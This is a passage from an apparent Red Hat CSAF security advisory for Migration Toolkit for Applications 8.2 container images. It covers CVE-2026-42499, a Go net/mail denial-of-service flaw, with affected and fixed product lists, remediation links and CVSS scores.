"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jupyterlab: JupyterLab: Arbitrary code execution due to improper enforcement of extension allow-list"
},
{
"cve": "CVE-2026-42499",
"cwe": {
"id": "CWE-1046",
"name": "Creation of Immutable Text Using String Concatenation"
},
"discovery_date": "2026-05-07T20:00:51.685602+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2467809"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `net/mail` package within the Go standard library. A remote attacker could provide specially crafted, pathological email addresses. When these malformed email addresses are parsed by the `consumePhrase` function, it can lead to excessive resource consumption due to quadratic string concatenation, resulting in a Denial of Service (DoS) condition.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net/mail: golang: net/mail: Denial of Service via pathological email address parsing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in the `net/mail` package of the Go standard library. A remote attacker can exploit this flaw by sending specially crafted email addresses, leading to excessive resource consumption and a denial of service in Go applications that parse email addresses using the affected library.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42499"
},
{
"category": "external",
"summary": "RHBZ#2467809",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467809"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42499",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42499"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42499",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42499"
},
{
"category": "external",
"summary": "https://go.dev/cl/771520",
"url": "https://go.dev/cl/771520"
},
{
"category": "external",
"summary": "https://go.dev/issue/78987",
"url": "https://go.dev/issue/78987"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M",
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4977",
"url": "https://pkg.go.dev/vuln/GO-2026-4977"
}
],
"release_date": "2026-05-07T19:41:18.615000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net/mail: golang: net/mail: Denial of Service via pathological email address parsing"
},
{
"cve": "CVE-2026-42504",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-06-02T23:01:00.320527+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
